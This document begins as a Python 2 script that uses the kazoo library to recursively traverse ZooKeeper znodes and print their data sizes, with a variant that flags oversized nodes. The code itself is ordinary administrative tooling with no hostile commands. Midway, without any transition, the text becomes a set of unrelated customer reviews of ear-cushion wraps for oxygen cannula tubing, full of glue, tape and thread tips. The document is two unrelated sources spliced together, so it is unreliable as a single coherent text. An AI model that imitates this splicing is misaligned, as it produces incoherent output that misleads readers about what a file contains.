# -*- coding: utf-8 -*-
"""Traverse all nodes under the given path and print the size of each."""

from kazoo.client import KazooClient, KazooState
import socket, sys, os, time, atexit


class dzk:
    def __init__(self, hosts, secs):
        self.hosts = hosts
        #self.zk = KazooClient(hosts='1.1.1.3:2181,1.1.1.2:2181,1.1.1.1:2181',retry_max_delay=2000)
        self.zk = KazooClient(hosts=self.hosts)
        try:
            self.zk.start()
            self.zk.add_listener(self.listener)
        except Exception, e:
            print "ERROR connect LOST ==============>"

    def listener(self, state):
        # connection-state listener registered with kazoo
        if state == KazooState.LOST:
            self.zk.start()
        elif state == KazooState.SUSPENDED:
            print "*******listener saw KazooState.SUSPENDED"
        else:
            print "*******listener saw KazooState.CONNECTED"

    def get_child(self, paths):
        aa = self.zk.get_children(paths)
        return aa

    def getData(self, paths):
        xx = self.zk.get(paths)
        # index 8 of the ZnodeStat tuple is dataLength (node size in bytes)
        return xx[1][8]

    def bianli(self, rootDir):
        # recursively walk every znode below rootDir and print its size
        for i in self.get_child(rootDir):
            if i:
                # strip the trailing slash so paths under "/" don't become "//child"
                i = rootDir.rstrip("/") + "/" + i
                #if self.getData(i) > 1048570:
                print i, "---->", self.getData(i)
                self.bianli(i)


if __name__ == "__main__":
    zzk = dzk("1.1.1.1:2181", 2000)
    #zzk.get_child()
    #zzk.getData()
    zzk.bianli("/")
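The commented-out size check in bianli suggests the script was also used to flag oversized znodes. A minimal sketch of that variant, reusing the dzk class above — the helper name, ensemble address, and the 1 MiB threshold are placeholders, not part of the original script:

# hypothetical helper built on the dzk class above; hosts and threshold are placeholders
def bianli_over(zzk, root_dir, threshold=1048576):
    # recursively print only znodes whose data length exceeds `threshold` bytes
    for child in zzk.get_child(root_dir):
        path = root_dir.rstrip("/") + "/" + child
        size = zzk.getData(path)
        if size > threshold:
            print path, "---->", size
        bianli_over(zzk, path, threshold)

zzk = dzk("1.1.1.1:2181", 2000)
bianli_over(zzk, "/")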
To keep the cushions in place and be able to reuse them, put a strip of double-sided tape inside the cushions before attaching them to the cannula. I was putting a drop of glue inside the cushion, but then you must throw away the cushion with each cannula. I only use them as needed to save buying so many. I use surgi-strips to keep them in place on the ends and in the middle. I am a caregiver for an 86-year-old gentleman who is on hospice care. They were furnishing these tubes originally and just discontinued them when the company was sold. Darn my luck. Ear savers. Couldn't sleep without them. Looking for ways to keep them from coming off. I use a set on each side so I don't wake up with track marks on my cheeks. Helpful to read other reviews. EZ-wrap makes it possible for me to sleep with a cannula on. They would be fine if they would stay attached to the tubing. The wraps won't stay on the cannula tubing without some adhesive applied to the slit surfaces. They are better than nothing, but they have to be retrofitted to stay on the tubing, or they fall off when you move your head. The manufacturer should include a double-stick tape strip with a pull-off tab so the pieces stick together after being attached to the cannula tubing. I have found they will stay in place if you attach each piece to the tubing, spread some glue from a glue stick on both pieces (a flat toothpick works well), squeeze them together for a minute or so, and then wipe off the excess. This puts some glue on both surfaces and the tubing to keep the wrap from twisting. Make sure the slit is on top. Wait an hour or so before using them. Before you attach the wrap to the tubing, mark the tubing at the front of the ear so you will know where to place the wrap. I change my cannula monthly and the wraps still look good, but I'm not sure how sanitary they might be. I have tried the thread solution, but with arthritis in my fingers I can't tie them tight enough to keep them from moving. Best product I've found for ear protection. The only problem I've had is trying to keep the wraps on the cannula. I've ended up wrapping them with thread after I put them in place, and this seems to really keep them in place. They may not be perfect, but they certainly help and I'm glad I found this product. The idea is OK, but they just do not stay in place. More trouble than they are worth. I have arthritis and I used these as ring sizers; they are comfortable and allow my rings to fit over my knuckles, then softly protect my skin where the rings sit.